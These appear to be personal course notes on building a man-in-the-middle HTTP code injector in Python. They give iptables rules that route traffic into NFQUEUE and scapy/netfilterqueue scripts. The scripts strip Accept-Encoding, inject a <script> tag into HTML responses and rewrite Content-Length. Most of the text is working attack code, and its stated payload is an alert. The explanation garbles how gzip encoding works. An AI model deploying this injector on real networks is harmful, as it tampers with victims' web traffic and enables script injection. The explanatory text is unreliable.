gzip IS use to compress HTML Encodings
Therefore when the browser sends the response it will first compress the response to a gzip format send it to us!
#IP-table FOR-REMOTE-PC
- -RUN: iptables -I OUTPUT -j NFQUEUE --queue-num 0
- -RUN: iptables -I INPUT -j NFQUEUE --queue-num 0
#IP-table FOR-LOCAL-PC
- -RUN: iptables -I FORWARD -j NFQUEUE --queue-num 0
# CODE: BASE
- #!/usr/bin/env python
- import netfilterqueue
- import scapy.all as scapy
- ack_list = []
- def set_load(packet, load):
- packet[scapy.Raw].load = load
- del packet[scapy.IP].len
- del packet[scapy.IP].chksum
- del packet[scapy.TCP].chksum
- return packet
- def process_packet(packet):
- scapy_packet = scapy.IP(packet.get_payload())
- if scapy_packet.haslayer(scapy.Raw):
- if scapy_packet[scapy.TCP].dport == 80:
- print("[+] Request")
- print(scapy_packet.show())
- elif scapy_packet[scapy.TCP].sport ==80:
- print("[+] Responce")
- print(scapy_packet.show())
- packet.accept()
- queue = netfilterqueue.NetfilterQueue()
- queue.bind(0, process_packet)
- queue.run()
# CODE: MODIFYING TO SEE HTTP
- WE DO THIS WITH THE HELP OF REGEX [https://pythex.org/]
- PREVIOUSLY DONE IN MAC CHANGER ALGORITHMS DESIGN
# CODE: injector
- #!/usr/bin/env python
- import netfilterqueue
- import scapy.all as scapy
- import re
- def set_load(packet, load):
- packet[scapy.Raw].load = load
- del packet[scapy.IP].len
- del packet[scapy.IP].chksum
- del packet[scapy.TCP].chksum
- return packet
- def process_packet(packet):
- scapy_packet = scapy.IP(packet.get_payload())
- if scapy_packet.haslayer(scapy.Raw):
- load = scapy_packet[scapy.Raw].load
- if scapy_packet[scapy.TCP].dport == 80:
- print("[+] Request")
- load = re.sub("Accept-Encoding:.*?\\r\\n", "", load)
- elif scapy_packet[scapy.TCP].sport == 80:
- print("[-] Response")
- print(scapy_packet.show())
- injection_code = "<script>alert('hello-senpaii');</script>"
- load = load.replace("</body>", injection_code + "</body>")
- content_length_search = re.search("(?:Content-Length:\s)(\d*)", load)
- if content_length_search and "text/html" in load:
- content_length = content_length_search.group(1)
- new_content_length = int(content_length) + len(injection_code)
- load = load.replace(content_length, str(new_content_length))
- if load != scapy_packet[scapy.Raw].load:
- new_packet = set_load(scapy_packet, load)
- packet.set_payload(str(new_packet))
- packet.accept()
- queue = netfilterqueue.NetfilterQueue()
- queue.bind(0, process_packet)
- queue.run()
# THIS IS THE FINAL OUT-PUT
here in code we use regex to convert gzip format to HTML format and injected our desire code that will run during the execution of the code hence for example alert
the issue was with the length it was not executing the alert because
when we inject our code it increase its size SEE IN IMG-
so we targeted the length with the regex and added the length of our desire website + length of written code
new_content_length = int(content_length) + len(injection_code)